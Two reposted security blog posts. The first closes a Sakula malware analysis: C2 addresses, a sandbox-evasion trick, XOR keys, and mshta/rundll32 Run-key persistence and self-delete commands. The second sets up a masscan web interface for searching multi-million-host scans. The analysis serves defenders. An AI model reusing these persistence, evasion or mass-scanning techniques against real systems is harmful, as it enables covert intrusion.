    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://23.226.65.197/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://23.226.65.197/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  23.226.65.197
}

struct ConfigV3_1d
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port;                       //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://www.xha-mster.com/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://www.xha-mster.com/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  www.xha-mster.com
}

An example of used URIs:

  • POST /view.asp?cstring=[HASH_MACHINE_NAME]&tom=[CMD_ID]&id=[CMD_SEQ_NUM]
  • GET /photo/[HASH_MACHINE_NAME].jpg?id=[CMD_SEQ_NUM]

v3.2 (09/01/2015)

Version 3.2 is distributed through a signed fake installer (compiled the 15/01/2015):

  • Certificate issued to U-Tech IY Service by SGTRUST CODE SIGNING CA

sakula_3_2_cert.png

blackvinev3_2_installer.png

blackvinev3_2_arch.png

The dropper has been adapted to launch a DLL:

  • does not execute while the mouse does not move (anti-sandbox trick)
  • extracts the payload located after the tag NNNNNNNN, decrypts it, and writes it to the file %TEMP%\Emabout.dll
  • extracts the payload located after the tag AAAAAAAA, decrypts it, and writes it to the file %TEMP%\shutil.dll
  • extracts the payload located after the tag BBBBBBBB and writes it to the file %TEMP%\Thumbs.db
  • executes %TEMP%\Emabout.dll with the command rundll32.exe [%TEMP%]\Emabout.dll CloseAbout
  • uninstalls itself with the command ping 127.0.0.1 & del /q [PATH]

The XOR key used to encrypt payloads has been changed and is now equal to 0x18.

The legitimate binary %TEMP%\Emabout.dll is a digitally signed executable from McAfee (VirusScan Enterprise v8.7.0.570).

sakula_legitmcaffeeexe_3_2_cert.png

The file %TEMP%\shutil.dll is a simple DLL which decrypts and executes Thumbs.db (hardcoded). It uses the single-byte XOR algorithm with the key 0x88.

The PE loader is the same as in v3.1.

Installation

Some changes have been made to the installation process. Sakula no longer drops exploits when the user does not have administrator rights. This feature has been dirtily removed: the code is still present but never executed (a return or goto has been placed at the beginning of the function).

To move itself to its new location, it moves dropped files to %Temp%\MicroWhoKnow (given in configuration):

  • Emabout.dll -> %Temp%\MicroWhoKnow\MicroWhoKnow.dll
  • shutil.dll -> %Temp%\MicroWhoKnow\shutil.dll
  • Thumbs.db -> %Temp%\MicroWhoKnow\Thumbs.db

Then it sets up autorun keys pointing to %Temp%\MicroWhoKnow\MicroWhoKnow.dll using cmd.exe with the following commands:

  • cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "MicroWhoknow" /t REG_SZ /d "mshta vbscript:CreateObject(\"WScript.Shell\").Run(\"cmd /c cd %Temp%\MicroWhoknow "&&" rundll32 MicroWhoknow.dll Plugupdate",0) (window.close)" (if admin)
  • cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MicroWhoknow" /t REG_SZ /d "mshta vbscript:CreateObject(\"WScript.Shell\").Run(\"cmd /c cd %Temp%\MicroWhoknow "&&" rundll32 MicroWhoknow.dll Plugupdate",0) (window.close)" (if not admin)

The command used in previous versions 3.0 and 3.1 to set up autorun keys is still present in data, but never used:

  • cmd.exe /c reg add %s\Software0\Microsoft\Windows\CurrentVersion\Run /v "%s" /t REG_SZ /d "rundll32 \"%s\" PlugUpdate"

It uses the same configuration structure as v3.0 and v3.1, but with different data:

struct ConfigV3_2
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x2710 (10000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100];        //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroWhoknow
    CHAR    copy_file_name[50];         //  MicroWhoknow.dll
    CHAR    autorun_key[50];            //  MicroWhoknow
    DWORD   port;                       //  0x50 (80)
    CHAR    uri_post[200];              //  /update.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://104.128.233.4/update.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://104.128.233.4/x0x/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  104.128.233.4
}

An example of used URIs:

  • POST /update.asp?cstring=[HASH_MACHINE_NAME]&tom=[CMD_ID]&id=[CMD_SEQ_NUM]
  • GET /x0x/[HASH_MACHINE_NAME].jpg?id=[CMD_SEQ_NUM]

This is the end of this long blog post on Sakula 2.x and 3.x. It is probably not the last one, so keep in touch!

Original Post: http://blog.airbuscybersecurity.com/post/2015/10/Malware-Sakula-Evolutions-%28Part-2/2%29

MASSCAN Web Interface

A couple of weeks ago, we had the opportunity to scan and map a large IP address space covering just over 3 million hosts. Our tool of choice for this was the fast and capable masscan, which is packaged in Kali. While masscan has several convenient output formats, such as binary and XML, one feature we were missing was an easy way to search our results. We quickly whipped up a little web interface that would allow us to import and search within a masscan XML output file. This feature proved very useful for us: once we identified a specific vulnerable pattern on a machine, we could easily cross-reference this pattern against the millions of discovered hosts in our database.

Setting up the MASSCAN Web Application

The setup of the masscan web user interface is pretty standard and straightforward. You will need to create a MySQL database, import the database schema, drop the PHP files under your web root, and edit the config file with the correct details. Here is what this process looks like.

First, install and set up your web server and some other required packages, check out a copy of the masscan-web-ui repository, and copy the MASSCAN web UI files to the web root:

root@kali:~# apt-get install apache2 php5 php5-mysql mysql-server
root@kali:~# systemctl start mysql
root@kali:~# systemctl start apache2
root@kali:~# git clone https://github.com/offensive-security/masscan-web-ui
root@kali:~# mv masscan-web-ui/* /var/www/html/
root@kali:~# cd /var/www/html/

Next, you’ll need to create a MySQL database and user for the web application and then import the masscan database schema.

root@kali:/var/www/html# mysql -u root -p
Enter password:
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> create database masscan;
Query OK, 1 row affected (0.01 sec)

mysql> CREATE USER 'masscan'@'localhost' IDENTIFIED BY 'changem3';
Query OK, 0 rows affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON masscan.* TO 'masscan'@'localhost';
Query OK, 0 rows affected (0.01 sec)

mysql> exit
Bye
root@kali:/var/www/html# mysql -u root -p masscan < db-structure.sql
Enter password:
root@kali:/var/www/html# rm db-structure.sql README.md

Lastly, you need to update the web configuration file with the MySQL user and database information that you configured above.

nano includes/config.php

define('DB_DRIVER', 'MySQL');
define('DB_HOST', 'localhost');
define('DB_USERNAME', 'masscan');
define('DB_PASSWORD', 'changem3');
define('DB_DATABASE', 'masscan');

With everything configured, you can now use masscan to scan your targets with the banner checking option, while specifying an XML output format for the results. More information about banner grabbing with masscan can be found on the masscan GitHub page.

masscan 10.0.0.0/8 -p80,21,53 --banners --source-ip 10.0.0.2 --max-rate 100000 -oX scan-01.xml

Once all of the scans have been completed, it’s time to import the scan results. In this example, we imported the results of two class A scans, while choosing to clear the database when importing the first results file.

root@kali:/var/www/html# ls -l scan*
-rw-r--r-- 1 root root 212929324 Dec 1 13:23 scan-01.xml
-rw-r--r-- 1 root root 700816226 Dec 1 13:55 scan-02.xml
root@kali:/var/www/html# php import.php scan-01.xml

Do you want to clear the database before importing (yes/no)?: yes

Clearing the db
Reading file
Parsing file
Processing data (This may take some time depending on file size)

Summary:
Total records:738279
Inserted records:738279
Took about:3 minutes,18 seconds
root@kali:/var/www/html# php import.php scan-02.xml

Do you want to clear the database before importing (yes/no)?: no
Reading file
Parsing file
Processing data (This may take some time depending on file size)

Summary:
Total records:2411974
Inserted records:2411974
Took about:9 minutes,41 seconds
root@kali:/var/www/html#

All that remains is to browse to the web application, with a total of more than 3 million results now easily searchable.
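As an added example (not part of the original post or of the masscan-web-ui project), a streaming reader for masscan's -oX output that yields one record per host/port and a banner search over them, the same cross-referencing the post describes but without the database; it uses iterparse and clears each host element so a file of several hundred MB does not have to fit in memory. The XML sample is constructed to match masscan's nmap-style layout, not a real scan.

```python
import io
import re
import xml.etree.ElementTree as ET

# Constructed sample in masscan's nmap-style -oX layout (not a real scan).
# The first record is a bare SYN-ACK, the next two carry --banners results.
SAMPLE_XML = b"""<?xml version="1.0"?>
<nmaprun scanner="masscan" start="1448974988" version="1.0-BETA" xmloutputversion="1.03">
<scaninfo type="syn" protocol="tcp" />
<host endtime="1448974988"><address addr="10.0.0.5" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="54"/></port></ports></host>
<host endtime="1448974989"><address addr="10.0.0.5" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"><state state="open" reason="response" reason_ttl="54"/><service name="http.server" banner="Apache/2.2.22 (Debian)"/></port></ports></host>
<host endtime="1448974990"><address addr="10.0.0.9" addrtype="ipv4"/><ports><port protocol="tcp" portid="21"><state state="open" reason="response" reason_ttl="64"/><service name="ftp" banner="220 ProFTPD 1.3.3c Server"/></port></ports></host>
<runstats><finished time="1448974991" elapsed="3" /><hosts up="2" down="0" total="2" /></runstats>
</nmaprun>
"""


def iter_masscan_records(stream):
    """Yield one dict per <host>/<port> pair from a masscan -oX file-like object.

    Parsing is incremental: each <host> element is discarded once its
    records have been yielded, so memory stays flat on large files.
    """
    for _event, elem in ET.iterparse(stream, events=("end",)):
        if elem.tag != "host":
            continue
        addr = elem.find("address")
        ip = addr.get("addr") if addr is not None else None
        for port in elem.iterfind("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            yield {
                "ip": ip,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else None,
                "service": svc.get("name") if svc is not None else None,
                "banner": svc.get("banner") if svc is not None else None,
            }
        elem.clear()  # free the parsed host so a multi-GB file fits in memory


def search_banners(records, pattern):
    """Return the records whose banner matches `pattern` (case-insensitive regex).
    Records without a banner (plain port-open results) never match."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [r for r in records if r["banner"] and rx.search(r["banner"])]


def load_sample():
    return list(iter_masscan_records(io.BytesIO(SAMPLE_XML)))


if __name__ == "__main__":
    for hit in search_banners(load_sample(), r"ProFTPD 1\.3\.3"):
        print("%s:%d  %s" % (hit["ip"], hit["port"], hit["banner"]))
```

To run it against a real file, replace io.BytesIO(SAMPLE_XML) with open("scan-01.xml", "rb").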

For more information and to try out the masscan-web-ui for yourself, you can check out our GitHub project page.

masscan-webui

 

Original Post: https://www.offensive-security.com/offsec/masscan-web-interface/
